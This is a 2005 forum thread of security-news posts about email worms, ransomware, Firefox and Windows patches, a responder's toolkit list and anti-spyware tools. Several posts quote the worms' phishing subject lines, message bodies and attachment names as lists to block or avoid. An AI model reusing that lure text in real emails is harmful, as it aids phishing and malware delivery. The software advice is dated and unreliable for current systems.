General discussion
-
CreatorTopic
-
May 20, 2005 at 6:55 am #2183464
Topic is locked -
CreatorTopic
All Comments
-
AuthorReplies
-
-
May 20, 2005 at 9:43 am #3238437
CBS News Feature — P2P Security & Privacy Dangers
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
CBS News Feature — P2P Privacy Dangers
A summary of some key risks associated with P2P File sharing:
1. Malware (including some of the most dangerous viruses out there) will be automatically written to openly shared hard drives. While AV protection can help, brand new viruses are created daily and seeded on P2P networks.
2. The exchange of music, CDs, P2P file shares violate Copyright Laws related to intellectual property rights. Individuals may rationalize that participating in P2P is no worse than using TIVO or copying a movie off of a cable station. Still, the “law is the law”. Due to current widespread practices the RIAA or DCMA can only make “examples” out of some of the unlucky ones they catch in the process.
3. The greatest danger of all is privacy invasion as illustrated in the article. By sharing your hard drive, ANYONE in the P2P network can potentially access ANYTHING on your hard drive. It could be a tax return, bank account spreadsheet, stored email messages, or other sensitive information.
-
May 20, 2005 at 9:43 am #3238438
Sober.P – Beware of Free World Cup 2006 Tickets
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
Virus writers continue to use social engineering techiques to trick folks into opening attachments. Sober.P has spread more successfully than most recent viruses, as it can tempt sports fans into thinking they have won something free. Usually in email, there are no “free lunches” as most of these types of emails are like telemarketing calls — there’s always a catch … and in this case you’ll catch a very advanced virus that is difficult to remove from Windows.
Sober.P – Beware of Free World Cup 2006 Tickets
http://www.google.com/search?hl=en&q=world+cup+sober.p
http://www.viruslist.com/en/weblog
http://www.theregister.com/2005/05/03/world_cup_virus/
http://netscape.com.com/4520-6600_7-6215417-1.html
http://www.webuser.co.uk/news/63573.htmlSober.p, which has caused outbreaks in various western European countries, owes some of its success to social engineering. It arrives as an attachment to infected messages which use a range of subject headers, messages and attachment names in both English and German. Some of the messages appear to promise tickets to the World Cup in 2006 – and who wouldn’t want World Cup tickets?
Infected emails pose as ticket confirmation messages from organisers of the football World Cup, due to be held in Germany next year. The worm composes messages with subject lines such as “WM-Ticket-Auslosung” and “Your Password” with attachments such as Fifa_Info-Text.zip containing a .pif payload file. Sober-P only infects Windows machines
-
May 20, 2005 at 9:43 am #3238432
Would you trade a cup of coffee for your password?
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
http://news.com.com/2061-10789-5697143.htmlQuote: Security vendor VeriSign found 66 percent would choose to give up their passwords for a Starbucks coffee, during an informal on-the-street survey conducted Thursday in San Francisco … Those that revealed their password or gave hints received a $3 gift card for Starbucks–the price of a latte
This study is sponsored by VeriSign (a leader in digital certificate technologies), so I’m confident 66% of folks surveyed would not truly reveal their passwords. The 66% may have provided a false password or more likely clues on their passwords. Most likely, the true number who would reveal their true passwords is probably less than 10%.
Still, individuals should do their utmost to protect all of their passwords. In helping in security issues, I’ve actually had folks send me their ISP or email account name and password. Sometimes a good strong password is the only lock you have to keep the bad guys out.
This same techique of trying to get users to reveal passwords was used about a year ago.
Would you trade your password for Chocolate?
P.S. Wonder if Starbucks has “Chocolate flavored Coffee” -
May 20, 2005 at 9:43 am #3238433
SQL-Server 2000 Service Pack 4 – Now Available
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
The release of Service Pack 4 for SQL-Server 2000 was on May 6, 2005. After lab testing, this new Service Pack will be worthwhile to install for improved security and to provide bug fixes for functional issues..
-
May 20, 2005 at 9:43 am #3238434
MyDoom.BQ (Mytob.ED) – Medium Risk at Secunia
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
This new virus has been declared as MEDIUM RISK by Secunia. TrendLabs has declared a Medium risk alert in order to control this new WORM_MYTOB variant that is currently spreading in Australia and Japan.
It uses a social engineering approach where there appears to be administrative or non-delivery issues associated with email message processing. On all non-delivery messages, it’s always important to never open attachments, even if it appears to be from someone you know or yourself.
MyTob.ED – Medium Risk Trend Micro
Diagram on how this worm spreads & potential to impact network
Email messages to block or avoid:
Subject: (any of the following)
– *IMPORTANT* Please Validate Your Email Account
– *IMPORTANT* Your Account Has Been Locked
– {random}
– Email Account Suspension
– Notice: **Last Warning**
– Notice:***Your email account will be suspended***
– Security measures
– Your email account access is restricted
– Your Email Account is Suspended For Security ReasonsMessage body: (any of the following)
– Account Information Are Attached!
– Once you have completed the form in the attached file , your account records will not be interrupted and will continue as normal.
– please look at attached document.
– To safeguard your email account from possible termination, please see the attached file.
– To unblock your email account acces, please see the attachement.
– We have suspended some of your email services, to resolve the problem you should read the attached document.
– {random}Attachment: (any of the following file names)
– {random}
– document_full
– email-doc
– email-info
– email-text
– IMPORTANT
– information
– info-text
– your_details(any of the following extensions)
– BAT
– CMD
– EXE
– PIF
– SCR
– ZIP -
May 20, 2005 at 9:43 am #3238435
Wurmark.J – MEDIUM RISK by Secunia/Trend
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
Avoid ZIP based attachments as this one is spreading significantly.
Wurmark.J – MEDIUM RISK by Secunia/Trend
Trend Micro WORM_WURMARK.J Information
quote: As of May 11, 2005 at 4:30 am (Pacific Daylight Time; GMT-7:00) TrendLabs has declared a Medium risk alert in order to control this new WURMARK variant that is currently spreading in France, India, Singapore, and Taiwan.This memory-resident worm propagates via email messages. Upon execution, it drops a copy of itself in the Windows system folder using a random file name. It also drops a randomly named (Dynamic Link Library) DLL file in the Windows system folder, which is a component of an IESpy, a Spyware program. This worm has a keylogging capability. It saves the logs typed by the user in a dropped random DLL file.
AVOID THE FOLLOWING ATTACHMENTS
Attachment: (any of the following file names)
•details.zip
•girls.zip
•image.zip
•love.zip
•message.zip
•music.zip
•news.zip
•photo.zip
•pic.zip
•readme.zip
•resume.zip
•screensaver.zip
•song.zip
•video.zip -
May 20, 2005 at 9:43 am #3238428
Firefox 1.04 – Released to address Critical Security issue
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
Mozilla has released version 1.04 of Firefox to address a security security issue and exploit discovered this week. I have installed the new release for Windows 98, 2000, and XP SP2 with no issues so far. While there are no in-the-wild threats or viruses associated with the new exploit, current Firefox users should upgrade to further protect their systems.
Firefox 1.04 – Security Changes and other release notes
Security Update to Firefox Now Available
Firefox 1.04 Free Download (English version 1.04)
Original Advisories on Security Issues
Mozilla Foundation Security Advisory 2005-42
Secunia – Mozilla Firefox Two Critical Vulnerabilities
The cross-site scripting and remote system access flaws were discovered in Firefox version 1.0.3, but other versions may also be affected, said security company Secunia, which issued the ratings Sunday. The two vulnerabilities, when combined, can be exploited, but no known cases have yet emerged where an attacker took advantage of the public exploit code.
One flaw involves “IFRAME” JavaScript URLs, which are not properly protected from being executed in the context of another URL in the history list. “If you visit a malicious Web site, it can steal cookie information from other Web sites you had previously visited,” said Thomas Kristensen, Secunia’s chief technology officer. The attacker could then use that information to engage in identity theft or gain access to other password-protected sites that the victim visited.
Mozilla issued the following workaround to prevent installing software automatically from web sites. This adds protection for future issues and it enhances security even after upgrading to version 1.04 (and can be toggled on or off as needed).
1. Select the “Options” dialog from the “Tools” menu
2. Select the “Web Features” icon
3. Click the “Allowed Sites” button on the same line as the “Allow web sites to install software” checkbox
4. Click the “Remove All Sites” button
5. Click “OK” -
May 20, 2005 at 9:43 am #3238429
Microsoft’s AV solution announced – Windows One Care
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
Microsoft Windows One Care – Press release
Windows One Care – Related Article
Windows One Care – Key Features
• Defense against viruses and spyware, as well as two way firewall protection
• Performance and reliability tools including disk cleanup, hard drive defragmentation and file repair.
• Backup and restore capabilities to allow users to automate the backup of their files on to CD or DVD, as well as the ability to restore saved versions of files back onto their PC -
May 20, 2005 at 9:43 am #3238430
F-Secure tests Toyota Prius to see if mobile phone virus can transfer
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
This was a neat read in F-Secure’s weblog:
Monday, May 9, 2005
In-depth investigation of the “Cabir-in-Cars” myth
http://www.f-secure.com/weblog/However a mobile worm infecting a car is a thought that one cannot let go easily, and even as we knew that the car cannot be infected, this was something
that just had to be tested for real. So we got a Toyota Prius to test out the myth. Credit has to be given to Toyota for trusting their systems enough to
actually lend the car for us for such testing. According to Toyota, this Prius model had identical in-car Bluetooth systems with the Lexus models, so it
was suitable for our tests. -
May 20, 2005 at 9:43 am #3238431
Sober.Q Virus – Produces extensive SPAM in German
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
The new Sober.Q variant is installed automatically from existing infected Sober.P systems. It generates extensive SPAM in German. While these SPAM messages don’t contain the virus itself, the URLs most likely point to sites could could contain adware, spyware, or possible viruses.
PLEASE DO NOT CLICK ON ANY URLS in these messages
http://www.f-secure.com/v-descs/sober_q.shtml
Sober.U — Trend Micro has indepth information
http://vil.nai.com/vil/content/v_133684.htm
Sober.Q was found on May 14th, 2005. This Sober variant doesn’t spread itself in e-mails. Instead, it mass-mails political statements. Sober.Q is installed to computers infected by Sober.P. Sober.Q is written in Visual Basic.
Like many Sober variants, this variant uses it’s own SMTP engine to send spammed messages to email addresses found on the infected system. It can generate several different email messages randomly, in either English or German depending on the version of Windows. Some messages may contain several links inside them.
-
May 21, 2005 at 5:44 pm #3339065
Firefox users should upgrade to 1.0.4 – new exploits released
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
K-OTic/FrSIRT has released 3 exploits against Firefox 1.03; If you haven’t upgraded to 1.04, this is yet another good reason to do so without delay.
Download firefox in a your preferred flavor. For a description of the problems, Mozilla has following URLs:
http://www.mozilla.org/security/announce/mfsa2005-44.html http://www.mozilla.org/security/announce/mfsa2005-43.html
-
May 22, 2005 at 5:43 pm #3338909
Secure your wireless network – Easy tips from Kim Komando
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
This outline provides an excellent and easy to follow format for securing a wireless network at home. Key approaches include: WPA, turning off unneeded wireless router services, using strong passwords, and reassigning SSIDs. I also recommend using XP SP2 which offers the most up-to-date support for wireless technology by Microsoft.
-
May 24, 2005 at 9:43 am #3242533
Office 12 – Will offer improved server based security on documents
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
The next edition of Microsoft Office should become available during 2006. It will offer improved security for server based documents.
Office 12 – Improved server based security on documents
http://techrepublic.com.com/2100-10877_11-5717662.htmlFederal record-keeping regulations, such as Sarbanes-Oxley and HIPAA, are forcing Microsoft to examine various ways to secure Office documents. With the next version of Office, Microsoft plans to let businesses set rules, enforced by server-based software, to determine how those documents are handled
Office 12 – Some early reported info on new features
http://techrepublic.com.com/2100-10877_11-5712784.html -
May 24, 2005 at 5:43 pm #3239222
MS04-023: PGPCoder Trojan – Encrypts & demands $200 for the key
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
This is a new malicious attack that’s not widespread and provides all the more reason to stay up-to-date with Microsoft Security updates.
MS04-023: PGPCoder Trojan – Encrypts & demands $200 for the key
http://news.zdnet.com/2100-1009_22-5718678.html
http://www.websensesecuritylabs.com/alerts/alert.php?AlertID=194
http://secunia.com/virus_information/18207/pgpcoder/Researchers at Symantec have seen the malicious program used in the ransom attack. The “Trojan.Pgpcoder” searches a victim’s hard disk drive for 15 common file types, including images and Microsoft Office file types. It then encrypts the files, removes the originals and drops a note asking $200 for the encryption key, Friedrichs said.
This memory-resident Trojan arrives via Internet or copied from disks. Upon execution, it encrypts all files on the system having the following extensions:
- ASC
- DB
- DB1
- DB2
- DBF
- DOC
- HTM
- HTML
- JPG
- PGP
- RAR
- RTF
- TXT
- XLS
- ZIP
-
May 27, 2005 at 4:47 pm #3180413
Witty Worm – “Patient zero” Analysis of First PCs attacked
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
A recent study was completed related to the Witty worm, which represents one of the most sophisticated attacks using a few vulnerability in the Black Ice Firewall system. The randomized IP generation and destructive disk algorithms used by Witty are detailed in the Long Version of the Slide show below.
Internet Storm Center
http://isc.sans.org/diary.php?date=2005-05-26Security Focus Article
http://www.securityfocus.com/news/11235Article – Outwitting the Witty Worm
http://www.cc.gatech.edu/~akumar/witty.htmlSlide Show – Long Version
(esp. pages 11-17, 41-42)
http://www.cc.gatech.edu/%7Eakumar/witty_slides.pdfSlide Show – Short Version
http://www.cc.gatech.edu/%7Eakumar/wisp.pdfReflections on Witty: Analyzing the Attacker
http://www.icsi.berkeley.edu/%7Enweaver/login_witty.txt -
May 28, 2005 at 4:47 pm #3180214
MS05-016:VBS_RUNEXPLT.C (arrives as Word Document)
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
This new threat arrives as a Word document and manipuates unpatched Windows PCs, manipulating the recent MS05-016 patch which was part of the April 2005 updates provided by Microsoft.
This malicious VBScript file takes advantage of the Windows Shell vulnerability, which could allow a remote malicious user to execute arbitrary code on the affected system. For more information about this vulnerability, please refer to the following Microsoft page: Microsoft Security Bulletin MS05-016
It usually arrives on a system as a Microsoft Word document. When executed on a vulnerable machine, it attempts to download and execute a file, which may also be malicious in nature, from the following location: Nnpyf.c{BLOCKED}nn.com. This malicious VBScript file runs on Windows 98, ME, 2000, and XP.
-
May 30, 2005 at 8:48 am #3179275
MS04-011: MYTOB.AR – New MEDIUM RISK worm
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
Trend and Secunia have issued MEDIUM RISK alerts for MYTOB.AR. Click these links below for more information:
MYTOB.AR – Secunia alert MEDIUM RISK
TREND MICRO – MEDIUM RISK
quote: As of May 30, 2005 3:08 AM (PDT/GMT-7:00), TrendLabs has declared a MEDIUM risk alert in order to control the spread of WORM_MYTOB.AR. TrendLabs has received several infection reports indicating that this worm is currently spreading in Australia, China, Hongkong, India, Japan, Korea, Philippines, Taiwan, and the United States.Similar to other MYTOB variants, this memory-resident worm propagates by sending a copy of itself as an attachment (file size is around 29,868 to 29,882 bytes) to an email message, which it sends to target recipients using its own Simple Mail Transfer Protocol (SMTP) engine.
EXAMPLE – Usually an EMAIL delivery or account issue
EMAIL FORMAT
Subject: (any of the following)
• {Random}
• *DETECTED* Online User Violation
• *IMPORTANT* Please Validate Your Email Account
• *IMPORTANT* Your Account Has Been Locked
• *WARNING* Your Email Account Will Be Closed
• Account Alert
• Email Account Suspension
• Important Notification
• Notice of account limitation
• Notice: **Last Warning**
• Notice:***Your email account will be suspended***
• Security measures
• Your email account access is restricted
• Your Email Account is Suspended For Security ReasonsAttachment: (any combination of the following file names and extension names)
File name:
• {random}
• account-details
• document
• document_full
• email-doc
• email-info
• info
• information
• info-text • instructions
• your_details
Extension name: BAT, CMD, EXE, PIF, SCR, ZIP -
June 1, 2005 at 6:45 am #3179693
Bagle.BO – MEDIUM RISK and spreading extensively
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
Please select from links below:
Bagle.BO F-Secure – MEDIUM RISKMcAfee – Bagle.dldr
MESSAGE LABS – SPECIAL ALERTNew Bagle Downloader spreading like wildfire via email
31 May 2005 – MessageLabs is warning computer users to be on their guard against a new variant of the Bagle downloader. MessageLabs has intercepted almost 70,000 copies already. The first copy was intercepted today at 13:24 GMT (14:24 BST). 45,769 copies have been stopped in the last hour (3-4pm BST). The virus appears to have originated from a Yahoo group.
The as yet unnamed Bagle downloader variant drops a trojan that attempts to download Bagle from a vast list of locations. Computer users who activate the file attached in the email invoke the virus, which harvests email addresses it finds on the computer’s hard drive. The virus then forwards itself onto the list of email addresses it has discovered in infected computer.
-
June 1, 2005 at 10:45 pm #3169910
Mytob.BI – Poses as an IT Administrator
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
The social engineering, advanced code, attack methods, and the ease in building new variants makes this family among the worst. Users must keep their AV protection updated daily to keep up with new threats.
Mytob.BI – Poses as an IT Administrator
The Mytob.BI variant prevents the infected machine from accessing several antivirus and security Web sites by redirecting the connection to a local machine, the security company added. While prevalence of the worm is still low, the damage potential is high, Trend Micro said. U.K.-based antivirus company Sophos PLC also rated the worm as a concern, due to the severe damage it could cause.
Researchers speculated that the Mytob worm family is popular with hackers because its code base is relatively easy to manipulate to create a new variant. Another version, Mytob.ar, was detected earlier this week, containing added spyware and adware elements.
The worm poses as a message from an IT administrator, warning recipients that their e-mail accounts are about to be suspended, Trend Micro said. Possible subject headers for the worm include “*IMPORTANT* Please Validate Your Email Account” and “Notice: **Last Warning**.”
-
June 1, 2005 at 10:45 pm #3169909
ISC publishes Scott’s Toolkit for Windows
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
The Internet Storm Center shares one handlers toolkit recommendations. This toolkit looks like it will provide you with everything you will need to monitor, troubleshoot and maintain you network. Some us might have personal preferences on AV vendors or other items, but it’s still a very nice list.
ISC publishes Scott’s Toolkit for Windows
I’ve created what I call “Security Kits” on both CD-Rs and now the new FlashRAM memory sticks with a lot of these tools on there You never know which neighbor or relative is going to be next on the list to go help out
Antivirus Tools
|– McAfee Stinger (updated routinely)
|– Symantec AV Corporate Edition v9 (soon to be v10)
|– Microsoft Malware Removal Tool (released monthly)
|– Current Symantec AV Intelligent Updater
Response Kit
|– NetCat (available now at SecurityFocus)
|– SysInternals AccessEnum
|– SysInternals AutoRuns
|– SysInternals Contig
|– SysInternals DiskView
|– SysInternals FileMon
|– SysInternals ListDLLs
|– SysInternals Page Defrag
|– SysInternals ProcessExplorer
|– SysInternals PS Tools
|– SysInternals RegMon
|– SysInternals Rootkit Revealer
|– SysInternals Sdelete
|– SysInternals ShareEnum
|– SysInternals Sync
|– SysInternals TCPView
|– SysInternals Miscellaneous tools
|– Heysoft LADS
|– myNetWatchman SecCheck
|– Inetcat.org NBTScan
|– FoundStone BinText
|– FoundStone Forensic Toolkit
|– FoundStone Fport
|– FoundStone Galleta
|– FoundStone Pasco
|– FoundStone Rifuti
|– FoundStone Vision
|– FoundStone ShoWin
|– FoundStone SuperScan
|– WinDump
|– Nmap
|– Tigerteam.se SBD (encrypted netcat)
|– GNU based unxutils (from unixutils.sourceforge.net)
|– Good copies of windows binaries (netstat, cmd, ipconfig, nbtstat)
Spyware Tools
|– AdAware (updated defs in same directory)
|– CWShredder
|– Hijack This
|– MS AntiSpyWare Beta
|– Spybot Search and Destroy (updated defs in same directory)
|– BHO Demon
Security Tools (this is my usual place to dump the .zip or .exe installers)
|– Heysoft LADS (list alternate data streams)
|– Inetcat.org NBTScan
|– MS Baseline Security Analyzer
|– MS IIS Lockdown tool
|– Sam Spade
|– SSH Client (SSH.com or Putty)
|– SysInternals Tools
|– Foundstone Tools
|– BlackIce PC Protection
|– Kerio Personal Firewall
|– Zone Alarm Personal Firewall
|– WinPcap
|– WinDump
|– Ethereal Installer
|– Nmap for windows (cli version)
Utilities
|– Adobe Acrobat Reader Installer
|– CPU-Z
|– FireFox Installer
|– Macromedia Flash and ShockWave Installers
|– Quicktime Standalone Installer
|– VNC Installer
|– Winzip Installer
|– ISCAlert
Service Packs ( on a 2nd CD )
|– Windows XP SP2
|– Windows 2000 SP4 (+rpc/lsass critical patches or SRP when released)
|– Windows 2003 Server SP1(Some additional CDs I keep around for the Unix geek in me)
Knoppix CD
Helix CDNote: Any commercial software above that is not freeware/shareware in the list above should be replaced in your toolkit with your company or campus licensed software.
-
June 3, 2005 at 6:45 am #3172442
MS04-011: Bobax.P – MEDIUM RISK at Trend
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
Trend has declared a MEDIUM RISK due to prevalance
MS04-011: Bobax.P – MEDIUM RISK at Trend
MS04-011: Bobax.Z – Symantec version
W32.Bobax.Z is a mass-mailing worm that lowers security settings and allows a compromised computer to be used as a covert proxy. The worm also sends an email to addresses gathered from the compromised computer.As of June 3, 2005 1:38 AM (PDT/GMT-7:00), TrendLabs has declared a MEDIUM risk alert in order to control the spread of WORM_BOBAX.P. TrendLabs has received several infection reports indicating that this worm is currently spreading in the United States, Singapore, Ireland, Japan, Peru, Australia and India.
Message body: (any of the following)
——————————————
Attached some pics that i found
Check this out 🙂
Hello,
I was going through my album, and look what I found..
Long time! Check this out!
Osama Bin Laden Captured.
Remember this?
Saddam Hussein – Attempted Escape, Shot dead
Secret!
Testing -
June 4, 2005 at 10:46 am #3170297
Spybot Search & Destroy version 1.4 available
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
Spyware S&D is an excellent spyware removal tool that is free for personal use. The following provide some key links from download.com:
Download.com Review of Spybot – Search & Destroy
The latest version of Spybot – Search & Destroy adds some truly useful features to an already excellent application. The program still checks your system against a comprehensive database of adware and other system invaders, but it works much faster now. It also features several interface improvements, including multiple skins for dressing up its appearance. Scan results now appear arranged by groups in a tree, and a sliding panel lets you instantly view information about a selected item to help you decide whether to kill it or not. The Immunize feature blocks a plethora of uninvited Web-borne flotsam before it reaches your computer. Other useful tools, including Secure Shredder, complement the program’s basic functionality for completely destroying files. Hosts File blocks adware servers from your computer, and System Startup lets you review which apps load when you start your computer. The functionality makes Spybot – Search & Destroy a must-have for all Internet users, and this version is a worthwhile upgrade.
-
June 4, 2005 at 10:46 am #3170298
Ad-Aware SE Personal Edition 1.06 available
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
Ad-Aware SE Personal Edition 1.06 is an excellent adware and spyware removal tool that is free for personal use. The following provide some key links from download.com:
Ad-Aware SE Personal Edition 1.06 – Information
Download.com Review of Ad-Aware SE Personal Edition
One of the first applications built to find and remove adware and spyware, Ad-aware SE Personal Edition’s excellent reputation is well justified. The sky-blue, skinnable interface features five buttons. The first two, Status and Scan, lead to the core function of the application. These buttons initiate a scan of your files for adware components. After scanning is complete, the program presents a summary of results, followed by a list from which you select exactly which components to remove. Right-clicking an individual entry gives some information about the piece of suspected adware, though we would like more details. Ad-aware SE can alert you to more malignant forms of malware by separating items into critical and negligible categories. The third button, Ad-watch, is nonfunctional in the Standard version. The fourth button, Plug-ins, shows you which Ad-aware plug-ins are installed. The fifth leads to the help files.
Ad-aware SE does an excellent job of quickly finding and removing most adware and spyware components, although you will have to restart and rescan for a seriously infected machine. We were pleased to see an auto-update feature included with the program, keeping Ad-aware up-to-date with the latest adware components. Ad-aware SE should be part of your arsenal for keeping your machine free of adware and spyware components.
-
June 4, 2005 at 10:46 am #3170296
Downloader.ABL (aka Small.AHE) – MEDIUM RISK (Osama virus)
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
Trend/Secunia also declared MEDIUM RISK on Troj Small.AHE, which is different than Bobax.P, but centers on the same theme.
For users, it’s essential to AVOID attachments from ANY politically themed email, as that’s often a common social engineering threat (like we saw with the German Sober.Q spam)
Secunia Information
http://secunia.com/virus_information/18540/
http://secunia.com/virus_information/18574/
This downloader trojan was mass-spammed on June 2, 2005. It may arrive in an email message as follows (messages vary):
Subject:
God Bless the USA!
Finally!
Captured..
He has captured..Body:
Xmong. Npos alter. almonsted nocks
Turn on your TV. Osama Bin Laden has been captured. While CNN has no pictures at this point of time, the military channel (PPV) released some pictures. I managed to capture a couple of these pictures off my TV. Ive attached a slideshow containing all the pictures I managed to capture. I apologize for the low quality, its the best I could do at this point of time. Hopefully CNN will have pictures and a video soon. God bless the USA! Stephen Christensen
Attachment: pics.zip, teamster.zip, usurus.zip, toxicology.zip
-
June 6, 2005 at 2:46 pm #3171523
MS04-007: RBOT variant – 1st worm to exploit ASN.1 via Internet
by harry waldron, cpcu, ccp · about 18 years, 10 months ago
In reply to Harry Waldron
Kaspersky’s weblog entry of June 5th entitled “Robots,vile robots everywhere!” is a great read
MS04-007: RBOT variant – 1st worm to exploit ASN.1 via Internet
Investigation of the packets revealed a Microsoft ASN.1 exploit, which tries to download and run an executable from the attacking machine via TFTP. We’ve secured a binary and took a look under the cover. The responsible worm was a Rbot variant, …
Besides the ASN.1 exploit – and this is the first worm to use it successfully on the Internet – the Rbot variant uses a multitude of other exploits, DCOM, RPC,Veritas Backup Exec, LSASS, MSSQL, password guessing and so on. It also steals registration keys from a good list of popular games, PayPal accounts logins, has an embedded backdoor and of course, DDoS capabilities.
Basically, it’s a worm which tries very hard to spread while at the same time, it tries to steal as many valuable data from the victim machine as it is available. It is a highly infectious worm, written for profit. And yes, most of the other worms we’re seeing nowadays are no different.
-
June 7, 2005 at 6:46 am #3171218
Secunia Advisory – Mozilla Frame Injection Vulnerability
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
Secunia has issued a moderately critical advisory for Mozilla browsers including Firefox 1.04 for a Frame Injection Vulnerability. This new vulnerability has not been exploited in-the-wild and can only occur while processing a trusted and hostile web site at the same time. Firefox users should look for an upcoming release and always be careful of sites visited and email URL links.
ZdNet Article: Mozilla Frame Injection Vulnerability
A 7-year-old flaw that could let an attacker place malicious content on trusted Web sites has resurfaced in the most recent Firefox browser, Secunia has warned. The flaw, which also affects some other Mozilla Foundation programs, lies in the way the software handles frames, which are a way of showing Web content in separate parts of the browser window.
As a result, an attacker could insert content into a frame on a trusted Web site, Secunia said. Account holders who believe they are interacting with a frame belonging to an online bank could be tricked into giving up personal information or downloading malicious code, for example. Secunia rated the issue “moderately critical.” The same “frame injection” vulnerability in Mozilla’s browsers was detailed by Secunia in July of last year. At the time, it did not affect the most recent versions of the applications.
For a spoofing attempt to work, a surfer would need to have both the attacker’s Web site and a trusted Web site open in different windows. A click on a link on the malicious site would then display the attacker’s content in a frame on the trusted Web site, Secunia said. The company advised people not to visit trusted and untrusted Web sites at the same time.
Secunia Advisory – Mozilla Frame Injection Vulnerability
Description: A seven year old vulnerability has been re-introduced in Mozilla and Firefox, which can be exploited by malicious people to spoof the contents of web sites.
Secunia Browser Frame Injection Vulnerability Test
The vulnerability has been confirmed in Firefox 1.0.4 and Mozilla 1.7.8. Other versions may also be affected.
Solution: Do not browse untrusted web sites while browsing trusted sites.
Mozilla Support Forums Information
The vulnerability has not been exploited, a moderator of a support forum on the Mozilla Web site wrote Monday, in response to the Secunia alert. For protection, the moderator advises people to close all other windows and tabs before accessing a Web site such as a bank or online store that requires them to type in personal data.
-
June 9, 2005 at 6:46 am #3191844
Skulls.L – Pretends to be pirated version of F-Secure’s Mobile AV product
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
This new variant of the Skulls mobile phone virus appears to be a free “pirated“ copy of F-Secure’s Anti-virus product for Mobile phones. Besides the legal and ethical considerations for using pirated copies of software, this new virus will lock the phone permanently until cleaning is accomplished by buying the real product. This social engineering scheme illustrates the dangers of installing free software offered by email, instant messaging, or other sources.
Links related to this new virus are noted below:
Skulls.L – Pretends to be F-Secure’s Mobile AV product
F-Secure’s Web Log Description
Skulls.L is a variant of SymbOS/Skulls.C trojan. The component files of the trojan are almost identical to Skulls.C. The main difference between Skulls.L and Skulls.C is that Skulls.L pretends to be a pirate copied version of F-Secure Mobile Anti-Virus.
REMOVAL Techniques
Disinfection with two Series 60 phones
Download F-Skulls tool from FTP site or
Download F-Skulls Tool directly with phone
1. Install F-Skulls.sis into infected phones memory card with a clean phone
2. Put the memory card with F-Skulls into infected phone
3. Start up the infected phone, the application menu should work now
4. Go to application manager and uninstall the SIS file in which you installed the Skulls.L
5. Download and install F-Secure Mobile Anti-Virus to remove any Cabirs dropped by the Skulls.L or with mobile itself http://mobile.f-secure.com
6. Remove the F-Skulls with application manager as the phone is now cleaned -
June 9, 2005 at 5:32 pm #3192440
Microsoft Security Updates planned for June 14th
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
On June 14, 2005, the Microsoft Security Response Center is planning to release:
Security Updates
• 7 Microsoft Security Bulletins affecting Microsoft Windows. The greatest aggregate, maximum severity rating for these security updates is Critical. Some of these updates will require a restart. 5 of these updates will be detectable using the Microsoft Baseline Security Analyzer (MBSA), 2 of these updates will be detectable using the Enterprise Scanning Tool (EST).
• 1 Microsoft Security Bulletin affecting Microsoft Windows and Microsoft Services for UNIX. The greatest aggregate, maximum severity rating for these security updates is Moderate. These updates may require a restart. These updates will be detectable using the Microsoft Baseline Security Analyzer (MBSA) and using the Enterprise Scanning Tool (EST).
• 1 Microsoft Security Bulletin affecting Microsoft Exchange. The greatest aggregate, maximum severity rating for this security update is Important. This update will not require a restart. This update will be detectable using the Microsoft Baseline Security Analyzer (MBSA) and using the Enterprise Scanning Tool (EST).
• 1 Microsoft Security Bulletin affecting Microsoft Internet Security and Acceleration (ISA) Server and Small Business Server. The greatest aggregate, maximum severity rating for these security updates is Moderate. These updates may require a restart. This update will be detectable using the Enterprise Scanning Tool (EST).
Microsoft Windows Malicious Software Removal Tool
• Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services and the Download Center. Note that this tool will NOT be distributed using Software Update Services (SUS).
-
June 11, 2005 at 4:22 am #3193113
MS00-037: Hackers use dangerous URLs with a Michael Jackson rumor
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
This email has no attachment, but if you click on the link a trojan horse can be downloaded on your PC. This downloader attack can open up your PC from a security perspective. MS00-37, which is a five year old Help File security flaw is also used to attack any completely unpatched PCs. While this new threat is not widespread, the media is reporting it on the news this morning.
ZDnet: Hackers use email URL create Jackson rumor
AVOID CLICKING ON THE URL IF YOU RECEIVE THIS EMAIL MESSAGE
News from Neverland — Last night, while in his Neverland Ranch, Michael Jackson has made a suicidal attempt. They suggest this attempt follows the last claim was made against the king of pop. 46 years old Michael has left pre-suicid note which describes and interpretes some of his sins.
-
June 13, 2005 at 8:22 pm #3192893
Attack of the Mytob worms – Several new variants
by harry waldron, cpcu, ccp · about 18 years, 9 months ago
In reply to Harry Waldron
